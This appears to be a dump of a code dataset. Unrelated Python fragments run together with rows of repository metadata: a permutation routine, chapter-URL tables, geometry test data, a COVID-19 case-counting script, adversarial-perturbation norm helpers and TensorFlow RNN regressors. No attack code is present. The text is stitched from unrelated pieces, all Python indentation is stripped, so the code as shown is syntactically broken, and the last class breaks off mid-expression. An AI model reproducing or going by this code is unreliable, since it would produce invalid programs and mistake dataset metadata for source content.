limit = len(lst1)+1
top = []
mylist = []
for i in range(limit):
top.append(i + 1)
top.pop(0)
for i in range(limit):
mylist.append(-1)
b = top[::-1]
#print(b,lst1,mylist)
for i in range(len(lst1)):
#print(mylist)
if b[i] != 2:
if b[i]%2 == 1:
if lst1[i+1]%2 == 1:
mylist = find_it_4(mylist, lst1[i], b[i])
#mylist[lst1[i]] = b[i]
elif lst1[i+1]%2 ==0:
mylist = find_it_neg_4(mylist, lst1[i], b[i])
#print("find neg: ", mylist, lst1[i], b[i])
elif b[i]%2 == 0:
if (lst1[i+1]+lst1[i+2])%2 == 1:
mylist = find_it_4(mylist, lst1[i], b[i])
#mylist[lst1[i]] = b[i]
elif (lst1[i+1]+lst1[i+2])%2 == 0:
mylist = find_it_neg_4(mylist, lst1[i], b[i])
#print("find neg: ", mylist, lst1[i], b[i])
elif b[i] == 2:
#print("b: ", b, "i: ", i, "lst1: ", lst1)
#print(mylist)
#print("mylist: ", mylist, "lst1[i]: ", lst1[i], "b[i]: ", b[i])
mylist = find_it_neg_4(mylist, lst1[i], b[i])
left = []
no = []
for i in range(len(mylist)):
left.append(i+1)
for i in left:
if i not in mylist:
no.append(i)
for i in range(len(mylist)):
if mylist[i] == -1:
mylist[i] = no[0]
#print(mylist)
return mylist
if __name__ == "__main__":
main()
| 32.474104
| 116
| 0.563735
| 3,419
| 24,453
| 3.768938
| 0.031881
| 0.073879
| 0.112991
| 0.061928
| 0.880878
| 0.857442
| 0.840369
| 0.821589
| 0.81088
| 0.805293
| 0
| 0.024481
| 0.305075
| 24,453
| 752
| 117
| 32.517287
| 0.733832
| 0.230933
| 0
| 0.790262
| 0
| 0
| 0.001027
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041199
| false
| 0
| 0
| 0
| 0.080524
| 0.003745
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c854f843cb3c80ca6bbdd41ed922815a1c205c0c
| 163
|
py
|
Python
|
data_structures/priority_queues/__init__.py
|
onyonkaclifford/data-structures-and-algorithms
|
e0ca4bfa878273d06bf22c303e47762b8ec3870b
|
[
"MIT"
] | null | null | null |
data_structures/priority_queues/__init__.py
|
onyonkaclifford/data-structures-and-algorithms
|
e0ca4bfa878273d06bf22c303e47762b8ec3870b
|
[
"MIT"
] | null | null | null |
data_structures/priority_queues/__init__.py
|
onyonkaclifford/data-structures-and-algorithms
|
e0ca4bfa878273d06bf22c303e47762b8ec3870b
|
[
"MIT"
] | null | null | null |
from priority_queue import Empty
from sorted_list_priority_queue import SortedListPriorityQueue
from unsorted_list_priority_queue import UnsortedListPriorityQueue
| 40.75
| 66
| 0.92638
| 19
| 163
| 7.578947
| 0.526316
| 0.270833
| 0.395833
| 0.319444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07362
| 163
| 3
| 67
| 54.333333
| 0.953642
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8d023f219b4538f2a6871cdc5ff9c64b52989ea1
| 3,176
|
py
|
Python
|
links.py
|
yakninja/evan-bot
|
8475a79a6369c78478eaca71cdc0e548f5853794
|
[
"BSD-2-Clause"
] | 1
|
2020-11-23T02:54:55.000Z
|
2020-11-23T02:54:55.000Z
|
links.py
|
yakninja/evan-bot
|
8475a79a6369c78478eaca71cdc0e548f5853794
|
[
"BSD-2-Clause"
] | null | null | null |
links.py
|
yakninja/evan-bot
|
8475a79a6369c78478eaca71cdc0e548f5853794
|
[
"BSD-2-Clause"
] | 1
|
2021-11-10T19:52:23.000Z
|
2021-11-10T19:52:23.000Z
|
# -*- coding: utf-8 -*-
LINKS = {
'1.01': 'https://pactwebserial.wordpress.com/category/story/arc-1-bonds/1-01/',
'1.02': 'https://pactwebserial.wordpress.com/category/story/arc-1-bonds/1-02/',
'1.03': 'https://pactwebserial.wordpress.com/category/story/arc-1-bonds/1-03/',
'1.04': 'https://pactwebserial.wordpress.com/category/story/arc-1-bonds/1-04/',
'1.05': 'https://pactwebserial.wordpress.com/category/story/arc-1-bonds/1-05/',
'1.06': 'https://pactwebserial.wordpress.com/category/story/arc-1-bonds/1-06/',
'1.07': 'https://pactwebserial.wordpress.com/category/story/arc-1-bonds/1-07/',
'1.x (Pages 1)': 'https://pactwebserial.wordpress.com/category/story/arc-1-bonds/1-x-pages-1/',
'2.01': 'https://pactwebserial.wordpress.com/2014/01/18/damages-2-1/',
'2.02': 'https://pactwebserial.wordpress.com/2014/01/21/damages-2-2/',
'2.03': 'https://pactwebserial.wordpress.com/2014/01/25/damages-2-3-2/',
'2.04': 'https://pactwebserial.wordpress.com/2014/01/28/damages-2-4/',
'2.05': 'https://pactwebserial.wordpress.com/2014/02/01/damages-2-5/',
'2.06': 'https://pactwebserial.wordpress.com/2014/02/04/damages-2-6/',
'2.07': 'https://pactwebserial.wordpress.com/category/story/arc-2-damages/2-07/',
'2.x (Pages 2)': 'https://pactwebserial.wordpress.com/category/story/arc-2-damages/2-x-pages-2/',
'2.y (Histories)': 'https://pactwebserial.wordpress.com/category/story/arc-2-damages/2-y-histories/',
'3.01': 'https://pactwebserial.wordpress.com/category/story/arc-3-breach/3-01/',
'3.02': 'https://pactwebserial.wordpress.com/category/story/arc-3-breach/3-02/',
'3.03': 'https://pactwebserial.wordpress.com/category/story/arc-3-breach/3-03/',
'3.04': 'https://pactwebserial.wordpress.com/category/story/arc-3-breach/3-04/',
'3.05': 'https://pactwebserial.wordpress.com/category/story/arc-3-breach/3-05/',
'3.x (Histories)': 'https://pactwebserial.wordpress.com/category/story/arc-3-breach/3-x-histories/',
'4.01': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-01/',
'4.02': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-02/',
'4.03': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-03/',
'4.04': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-04/',
'4.05': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-05/',
'4.06': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-06/',
'4.07': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-07/',
'4.08': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-08/',
'4.09': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-09/',
'4.10': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-10/',
'4.11': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-11/',
'4.12': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-12/',
'4.x (Pages 4)': 'https://pactwebserial.wordpress.com/category/story/arc-4-collateral/4-x-pages-4/',
}
| 73.860465
| 105
| 0.691121
| 483
| 3,176
| 4.544513
| 0.086957
| 0.295216
| 0.442825
| 0.492027
| 0.889749
| 0.884282
| 0.785877
| 0.785877
| 0.759453
| 0.759453
| 0
| 0.093878
| 0.074307
| 3,176
| 42
| 106
| 75.619048
| 0.652721
| 0.006612
| 0
| 0
| 0
| 0.815789
| 0.857913
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
23b1482d017bc3838c8671335e3934fa9302e2cd
| 185
|
py
|
Python
|
test/conftest.py
|
yuemingl/ode-python-1
|
a9a12d9d3b7e611874a8d30f6a5c0b83b6087f86
|
[
"MIT"
] | 9
|
2020-05-31T09:22:40.000Z
|
2021-09-15T18:15:15.000Z
|
test/conftest.py
|
yuemingl/ode-python-1
|
a9a12d9d3b7e611874a8d30f6a5c0b83b6087f86
|
[
"MIT"
] | 1
|
2020-11-15T11:38:45.000Z
|
2020-11-15T11:38:45.000Z
|
test/conftest.py
|
yuemingl/ode-python-1
|
a9a12d9d3b7e611874a8d30f6a5c0b83b6087f86
|
[
"MIT"
] | 2
|
2020-11-14T21:47:01.000Z
|
2021-08-03T02:28:10.000Z
|
# -*- coding: utf-8 -*-
from .utils.world import g
from .utils.world import world
from .utils.space import space
from .utils.space import ground
from .utils.space import contactgroup
| 20.555556
| 37
| 0.751351
| 28
| 185
| 4.964286
| 0.392857
| 0.323741
| 0.302158
| 0.431655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006329
| 0.145946
| 185
| 8
| 38
| 23.125
| 0.873418
| 0.113514
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
23d5e9aaff62ea005a16a967a858be0ce4c5b5d9
| 1,547
|
py
|
Python
|
tests/data/test_degenerate_zero_length_02.py
|
ideasman42/isect_segments-bentley_ottmann
|
19deb3c5be4c2b91689b87548a875054b43e9952
|
[
"MIT"
] | 80
|
2015-12-04T15:06:49.000Z
|
2022-03-02T18:08:15.000Z
|
test/data/test_degenerate_zero_length_02.py
|
lolistoy/sweepline
|
82a2464f984c119dd438489c5f826e9693a7fabf
|
[
"MIT"
] | 25
|
2015-10-18T13:58:28.000Z
|
2021-06-23T21:54:54.000Z
|
test/data/test_degenerate_zero_length_02.py
|
lolistoy/sweepline
|
82a2464f984c119dd438489c5f826e9693a7fabf
|
[
"MIT"
] | 37
|
2016-07-06T01:38:33.000Z
|
2022-02-19T03:53:14.000Z
|
data = (
((-1.000000, 1.000000), (1.000000, 1.000000)),
((-1.000000, 1.000000), (-1.000000, 1.000000)),
((-1.000000, -1.000000), (-1.000000, 1.000000)),
((1.000000, -1.000000), (-1.000000, -1.000000)),
((1.000000, -1.000000), (1.000000, -1.000000)),
((1.000000, 1.000000), (1.000000, -1.000000)),
((1.000000, 1.000000), (1.000000, 1.000000)),
((-1.000000, -1.000000), (-1.000000, -1.000000)),
((-0.900000, 0.900000), (0.900001, 0.900000)),
((-0.900000, 0.900000), (-0.900000, 0.900000)),
((-0.900000, -0.900000), (-0.900000, 0.900000)),
((0.900001, -0.900000), (-0.900000, -0.900000)),
((0.900001, -0.900000), (0.900001, -0.900000)),
((0.900001, 0.900000), (0.900001, -0.900000)),
((0.900001, 0.900000), (0.900001, 0.900000)),
((-0.900000, -0.900000), (-0.900000, -0.900000)),
((-0.800000, 0.800000), (0.800000, 0.800000)),
((-0.800000, 0.800000), (-0.800000, 0.800000)),
((-0.800000, -0.800000), (-0.800000, 0.800000)),
((0.800000, -0.800000), (-0.800000, -0.800000)),
((0.800000, -0.800000), (0.800000, -0.800000)),
((0.800000, 0.800000), (0.800000, -0.800000)),
((0.800000, 0.800000), (0.800000, 0.800000)),
((-0.800000, -0.800000), (-0.800000, -0.800000)),
((-0.700000, 0.700000), (0.700000, 0.700000)),
((-0.700000, 0.700000), (-0.700000, 0.700000)),
((-0.700000, -0.700000), (-0.700000, 0.700000)),
((0.700000, -0.700000), (-0.700000, -0.700000)),
((0.700000, -0.700000), (0.700000, -0.700000)),
((0.700000, 0.700000), (0.700000, -0.700000)),
((0.700000, 0.700000), (0.700000, 0.700000)),
((-0.700000, -0.700000), (-0.700000, -0.700000)),
)
| 44.2
| 49
| 0.581771
| 257
| 1,547
| 3.501946
| 0.031128
| 0.248889
| 0.284444
| 0.482222
| 0.995556
| 0.995556
| 0.995556
| 0.995556
| 0.995556
| 0.995556
| 0
| 0.633216
| 0.085326
| 1,547
| 34
| 50
| 45.5
| 0.002827
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
f1d43d49b18f8bca3a508a074de7ff1e1a00d598
| 6,585
|
py
|
Python
|
data/actual_cases.py
|
enflujo/COVID_schools_dashboard
|
702c9c3c91938e514e56f4cf6f325ed954d7bc3e
|
[
"Apache-2.0"
] | null | null | null |
data/actual_cases.py
|
enflujo/COVID_schools_dashboard
|
702c9c3c91938e514e56f4cf6f325ed954d7bc3e
|
[
"Apache-2.0"
] | null | null | null |
data/actual_cases.py
|
enflujo/COVID_schools_dashboard
|
702c9c3c91938e514e56f4cf6f325ed954d7bc3e
|
[
"Apache-2.0"
] | 2
|
2021-09-25T15:37:45.000Z
|
2021-10-01T17:48:28.000Z
|
import datetime
import pandas as pd
import numpy as np
def str_to_datetime(date_str):
# convert DD/MM/YYYY to type datetime
format_str = '%d/%m/%Y' # The format
datetime_obj = datetime.datetime.strptime(date_str, format_str)
return datetime_obj.date()
def get_latest_data(filename='/Users/samueltorres/Documents/Projects/Multilayer_COVID19/data/OSB_EnfTransm-COVID-19.csv'):
cases_data = pd.read_csv(filename,encoding= 'unicode_escape', delimiter=';')
df_cases_data = pd.DataFrame(columns=['reported_date','type'])
reported_dates = cases_data['FECHA_DIAGNOSTICO']
reported_dates_conv = []
for data_date in reported_dates:
if isinstance(data_date, str):
date_converted = str_to_datetime(data_date)
else:
date_converted = datetime.date(0000,0,0)
reported_dates_conv.append(date_converted)
df_cases_data['reported_date'] = reported_dates_conv
df_cases_data['type'] = cases_data['ESTADO']
df_latest_cases = pd.DataFrame(columns=['reported_date','type'])
consider_from = datetime.date(2021,1,1)
latest_dates_l = []
latest_cases_l = []
for idx, data_ in df_cases_data.iterrows():
if data_['reported_date'] < consider_from:
continue
else:
latest_dates_l.append(data_['reported_date'])
latest_cases_l.append(data_['type'])
df_latest_cases['reported_date'] = latest_dates_l
df_latest_cases['type'] = latest_cases_l
return df_latest_cases
def get_complete_data(filename='/Users/samueltorres/Documents/Projects/Multilayer_COVID19/data/OSB_EnfTransm-COVID-19.csv'):
# read data
cases_data = pd.read_csv(filename,encoding= 'unicode_escape', delimiter=';')
# create DataFrame
df_clean_data = pd.DataFrame(columns=['reported_date','type'])
# extract dates
reported_dates = cases_data['FECHA_DIAGNOSTICO']
reported_dates_conv = []
for data_date in reported_dates:
if isinstance(data_date, str):
date_converted = str_to_datetime(data_date)
else:
date_converted = datetime.date(0000,0,0)
reported_dates_conv.append(date_converted)
# extract states
reported_types = cases_data['ESTADO']
reported_type_conv = []
for data_type in reported_types:
if data_type == 'Leve':
reported_type_conv.append(2)
elif data_type == 'Moderado':
reported_type_conv.append(3)
elif data_type == 'Grave':
reported_type_conv.append(4)
elif data_type == 'Fallecido':
reported_type_conv.append(5)
elif data_type == 'Recuperado':
reported_type_conv.append(6)
elif data_type == 'Fallecido (No aplica No causa Directa)':
reported_type_conv.append(98)
else:
reported_type_conv.append(99)
# save cleaned data
df_clean_data['reported_date'] = reported_dates_conv
df_clean_data['type'] = reported_type_conv
# sort dates
df_clean_data = df_clean_data.sort_values(by='reported_date')
# create states DataFrame
df_states_list = []
start_date = min(df_clean_data['reported_date'])
end_date = max(df_clean_data['reported_date'])
delta_d = datetime.timedelta(days=1)
# iterate over days
while start_date <= end_date:
start_date += delta_d
actual_date = start_date
data_i_mask = df_clean_data['reported_date'] == actual_date
data_i = pd.DataFrame(df_clean_data[data_i_mask])
df_states_data = pd.DataFrame(columns=['reported_date','I1','I2','I3','D','R'])
df_states_data['reported_date'] = actual_date
df_states_data['I1'] = sum(data_i['type'] == 2)
df_states_data['I2'] = sum(data_i['type'] == 3)
df_states_data['I3'] = sum(data_i['type'] == 4)
df_states_data['D'] = sum(data_i['type'] == 5)
df_states_data['R'] = sum(data_i['type'] == 6)
df_states_list.append(df_states_data)
df_return = pd.concat(df_states_list)
return df_return
data = get_latest_data()
data.to_csv('data/LatestCases_Bogota.csv',index=False)
filename='/Users/samueltorres/Documents/Projects/Multilayer_COVID19/data/OSB_EnfTransm-COVID-19.csv'
cases_data = pd.read_csv(filename,encoding= 'unicode_escape', delimiter=';')
# create DataFrame
df_clean_data = pd.DataFrame(columns=['reported_date','type'])
# extract dates
reported_dates = cases_data['FECHA_DIAGNOSTICO']
reported_dates_conv = []
for data_date in reported_dates:
if isinstance(data_date, str):
date_converted = str_to_datetime(data_date)
else:
date_converted = datetime.date(0000,0,0)
reported_dates_conv.append(date_converted)
# extract states
reported_types = cases_data['ESTADO']
reported_type_conv = []
for data_type in reported_types:
if data_type == 'Leve':
reported_type_conv.append(2)
elif data_type == 'Moderado':
reported_type_conv.append(3)
elif data_type == 'Grave':
reported_type_conv.append(4)
elif data_type == 'Fallecido':
reported_type_conv.append(5)
elif data_type == 'Recuperado':
reported_type_conv.append(6)
elif data_type == 'Fallecido (No aplica No causa Directa)':
reported_type_conv.append(98)
else:
reported_type_conv.append(99)
# save cleaned data
df_clean_data['reported_date'] = reported_dates_conv
df_clean_data['type'] = reported_type_conv
# sort dates
df_clean_data = df_clean_data.sort_values(by='reported_date')
# create states DataFrame
df_states_list = []
start_date = min(df_clean_data['reported_date'])
end_date = max(df_clean_data['reported_date'])
delta_d = datetime.timedelta(days=1)
# iterate over days
while start_date <= end_date:
actual_date = start_date
data_i_mask = df_clean_data['reported_date'] == actual_date
data_i = pd.DataFrame(df_clean_data[data_i_mask])
df_states_data = pd.DataFrame(columns=['reported_date','I1','I2','I3','D','R'])
print(sum(data_i['type'] == 2))
df_states_data['reported_date'] = actual_date
df_states_data['I1'] = sum(data_i['type'] == 2)
df_states_data['I2'] = sum(data_i['type'] == 3)
df_states_data['I3'] = sum(data_i['type'] == 4)
df_states_data['D'] = sum(data_i['type'] == 5)
df_states_data['R'] = sum(data_i['type'] == 6)
df_states_list.append(df_states_data)
start_date += delta_d
df_return = pd.concat(df_states_list)
| 38.284884
| 124
| 0.673956
| 897
| 6,585
| 4.584169
| 0.138239
| 0.064202
| 0.048152
| 0.074903
| 0.839494
| 0.839494
| 0.831226
| 0.799854
| 0.796693
| 0.796693
| 0
| 0.015149
| 0.208049
| 6,585
| 172
| 125
| 38.284884
| 0.773346
| 0.044039
| 0
| 0.785185
| 0
| 0
| 0.153234
| 0.04683
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022222
| false
| 0
| 0.022222
| 0
| 0.066667
| 0.007407
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f1e5fb301f7e3afa076783bd96ee57213ac4d86d
| 1,491
|
py
|
Python
|
attacks/norms.py
|
sukrutrao/Adversarial-Patch-Training
|
b7322e6f4d94029ceb0dcb946d2b6852c795990f
|
[
"Unlicense"
] | 21
|
2020-08-04T12:47:03.000Z
|
2022-03-22T09:34:29.000Z
|
attacks/norms.py
|
sukrutrao/Adversarial-Patch-Training
|
b7322e6f4d94029ceb0dcb946d2b6852c795990f
|
[
"Unlicense"
] | 3
|
2021-06-08T22:13:00.000Z
|
2022-03-12T00:45:16.000Z
|
attacks/norms.py
|
sukrutrao/Adversarial-Patch-Training
|
b7322e6f4d94029ceb0dcb946d2b6852c795990f
|
[
"Unlicense"
] | 6
|
2020-08-04T12:47:05.000Z
|
2022-02-13T00:58:03.000Z
|
import torch
import math
class Norm:
def __call__(self, perturbations):
"""
Norm.
:param perturbations: perturbations
:type perturbations: torch.autograd.Variable
"""
raise NotImplementedError()
def normalize(self, gradients):
"""
Normalization.
:param gradients: gradients
:type gradients: torch.autograd.Variable
"""
raise NotImplementedError()
def scale(self, gradients):
"""
Normalization.
:param gradients: gradients
:type gradients: torch.autograd.Variable
"""
raise NotImplementedError()
class LInfNorm(Norm):
def __call__(self, perturbations):
"""
Norm.
:param perturbations: perturbations
:type perturbations: torch.autograd.Variable
"""
return torch.max(torch.abs(perturbations.view(perturbations.size()[0], -1)), dim=1)[0]
def normalize(self, gradients):
"""
Normalization.
:param gradients: gradients
:type gradients: torch.autograd.Variable
"""
gradients.data = torch.sign(gradients.data)
def scale(self, gradients):
"""
Normalization.
:param gradients: gradients
:type gradients: torch.autograd.Variable
"""
gradients.data = torch.div(gradients.data, torch.max(torch.abs(gradients.data.view(gradients.size()[0], -1)), dim=1)[0].view(-1, 1, 1, 1))
| 22.938462
| 146
| 0.594232
| 138
| 1,491
| 6.362319
| 0.224638
| 0.088838
| 0.143508
| 0.14123
| 0.801822
| 0.801822
| 0.749431
| 0.749431
| 0.749431
| 0.749431
| 0
| 0.011331
| 0.289738
| 1,491
| 65
| 146
| 22.938462
| 0.817753
| 0.345406
| 0
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.375
| false
| 0
| 0.125
| 0
| 0.6875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
f1f06f0e07d0e6221172b657724d4ac58491e51b
| 41
|
py
|
Python
|
external/models/TransH_USE_h1/__init__.py
|
swapUniba/Elliot_refactor-tesi-Ventrella
|
3ddffc041696c90a6f6d3e8906c212fc4f55f842
|
[
"Apache-2.0"
] | null | null | null |
external/models/TransH_USE_h1/__init__.py
|
swapUniba/Elliot_refactor-tesi-Ventrella
|
3ddffc041696c90a6f6d3e8906c212fc4f55f842
|
[
"Apache-2.0"
] | null | null | null |
external/models/TransH_USE_h1/__init__.py
|
swapUniba/Elliot_refactor-tesi-Ventrella
|
3ddffc041696c90a6f6d3e8906c212fc4f55f842
|
[
"Apache-2.0"
] | null | null | null |
from .TransH_USE_h1 import TransH_USE_h1
| 20.5
| 40
| 0.878049
| 8
| 41
| 4
| 0.625
| 0.5625
| 0.6875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054054
| 0.097561
| 41
| 1
| 41
| 41
| 0.810811
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
f1f84e95138418b31bbba2da5270921e626ca2c3
| 29,188
|
py
|
Python
|
corl/model/base.py
|
agux/faix
|
99fcca313518b57dcde46c2ddcea9896598b64ea
|
[
"MIT"
] | null | null | null |
corl/model/base.py
|
agux/faix
|
99fcca313518b57dcde46c2ddcea9896598b64ea
|
[
"MIT"
] | 7
|
2020-04-04T04:53:36.000Z
|
2022-02-10T00:42:39.000Z
|
corl/model/base.py
|
agux/faix
|
99fcca313518b57dcde46c2ddcea9896598b64ea
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
# Path hack.
import sys
import os
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/../..")
import functools
import tensorflow as tf
import numpy as np
import math
from pstk.model.model import lazy_property, stddev
from pstk.model.cells import LayerNormNASCell, LayerNormGRUCell
# pylint: disable-msg=E1101
class SRnnRegressor:
'''
Simple RNN Regressor using one of:
GRU,
GRUBlock,
LSTM,
BasicLSTM,
LayerNormBasicLSTM,
GLSTM,
GridLSTM,
LSTMBlock,
UGRNN,
NAS,
etc...
'''
def __init__(self, data, target, seqlen, cell, use_peepholes=False, groups=1,
tied=False, layer_width=200, learning_rate=1e-3):
self.data = data
self.target = target
self.seqlen = seqlen
self._layer_width = layer_width
self._learning_rate = learning_rate
self._cell = cell
self._use_peepholes = use_peepholes
self._tied = tied
self._groups = groups
self.logits
self.optimize
self.cost
self.worst
def getName(self):
return self.__class__.__name__
@lazy_property
def logits(self):
layer = self.rnn(self, self.data)
output = tf.compat.v1.layers.dense(
inputs=layer,
units=1,
kernel_initializer=tf.compat.v1.truncated_normal_initializer(
stddev=stddev(1.0, int(layer.get_shape()[-1]))),
bias_initializer=tf.compat.v1.constant_initializer(0.1),
activation=tf.nn.tanh,
name="output"
)
output = tf.squeeze(output)
return output
@staticmethod
def rnn(self, inputs):
c = None
_cell = self._cell.lower()
if _cell == 'gru':
c = tf.compat.v1.nn.rnn_cell.GRUCell(
num_units=self._layer_width
)
elif _cell == 'grublock':
c = tf.contrib.rnn.GRUBlockCellV2(
num_units=self._layer_width
)
elif _cell == 'lstm':
c = tf.compat.v1.nn.rnn_cell.LSTMCell(
num_units=self._layer_width,
use_peepholes=self._use_peepholes
)
elif _cell == 'basiclstm':
c = tf.compat.v1.nn.rnn_cell.BasicLSTMCell(
num_units=self._layer_width
)
elif _cell == 'layernormbasiclstm':
c = tf.contrib.rnn.LayerNormBasicLSTMCell(
num_units=self._layer_width
)
elif _cell == 'glstm':
c = tf.contrib.rnn.GLSTMCell(
num_units=self._layer_width,
number_of_groups=self._groups
)
elif _cell == 'gridlstm':
c = tf.contrib.rnn.GridLSTMCell(
num_units=self._layer_width,
use_peephole=self._use_peepholes,
share_time_frequency_weights=self._tied,
num_unit_shards=self._groups
# feature_size = feat_size,
# num_frequency_blocks = ?
)
elif _cell == 'grid1lstm':
c = tf.contrib.grid_rnn.Grid1LSTMCell(
num_units=self._layer_width,
use_peepholes=self._use_peepholes,
output_is_tuple=False
)
elif _cell == 'grid2lstm':
c = tf.contrib.grid_rnn.Grid2LSTMCell(
num_units=self._layer_width,
use_peepholes=self._use_peepholes,
tied=self._tied,
output_is_tuple=False
)
elif _cell == 'grid3lstm':
c = tf.contrib.grid_rnn.Grid3LSTMCell(
num_units=self._layer_width,
use_peepholes=self._use_peepholes,
tied=self._tied,
output_is_tuple=False
)
elif _cell == 'grid2gru':
c = tf.contrib.grid_rnn.Grid2GRUCell(
num_units=self._layer_width,
tied=self._tied,
output_is_tuple=False
)
elif _cell == 'lstmblock':
c = tf.contrib.rnn.LSTMBlockCell(
num_units=self._layer_width,
use_peephole=self._use_peepholes
)
elif _cell == 'nas':
c = tf.contrib.rnn.NASCell(
num_units=self._layer_width,
use_biases=True
)
elif _cell == 'ugrnn':
c = tf.contrib.rnn.UGRNNCell(
num_units=self._layer_width
)
else:
raise ValueError('unrecognized cell type:{}'.format(_cell))
output, _ = tf.compat.v1.nn.dynamic_rnn(
# output, _ = tf.nn.dynamic_rnn(
c,
inputs,
dtype=tf.float32,
sequence_length=self.seqlen
)
output = self.last_relevant(output, self.seqlen)
print('last time step: {}'.format(output.get_shape()))
return output
@staticmethod
def last_relevant(output, length):
with tf.compat.v1.name_scope("last_relevant"):
batch_size = tf.shape(input=output)[0]
relevant = tf.gather_nd(output, tf.stack(
[tf.range(batch_size), length-1], axis=1))
return relevant
@lazy_property
def cost(self):
logits = self.logits
with tf.compat.v1.name_scope("cost"):
return tf.compat.v1.losses.mean_squared_error(labels=self.target, predictions=logits)
@lazy_property
def optimize(self):
return tf.compat.v1.train.AdamOptimizer(self._learning_rate,
epsilon=1e-7).minimize(
self.cost, global_step=tf.compat.v1.train.get_global_step())
@lazy_property
def worst(self):
logits = self.logits
with tf.compat.v1.name_scope("worst"):
sqd = tf.math.squared_difference(logits, self.target)
bidx = tf.argmax(input=sqd)
max_diff = tf.sqrt(tf.reduce_max(input_tensor=sqd))
predict = tf.gather(logits, bidx)
actual = tf.gather(self.target, bidx)
return bidx, max_diff, predict, actual
class SRnnRegressorV2:
'''
Simple RNN Regressor using one of:
GRU,
GRUBlock,
LSTM,
BasicLSTM,
LayerNormBasicLSTM,
GLSTM,
GridLSTM,
LSTMBlock,
UGRNN,
NAS,
etc...
'''
def __init__(self, data, target, seqlen, cell, use_peepholes=False, groups=1,
tied=False, layer_width=200, learning_rate=1e-3):
self.data = data
self.target = target
self.seqlen = seqlen
self._layer_width = layer_width
self._learning_rate = learning_rate
self._cell = cell
self._use_peepholes = use_peepholes
self._tied = tied
self._groups = groups
self.logits
self.optimize
self.cost
self.worst
def getName(self):
return self.__class__.__name__
@lazy_property
def logits(self):
layer = self.rnn(self, self.data)
layer = tf.nn.relu(layer)
output = tf.compat.v1.layers.dense(
inputs=layer,
units=1,
kernel_initializer=tf.compat.v1.variance_scaling_initializer(),
bias_initializer=tf.compat.v1.constant_initializer(0.1),
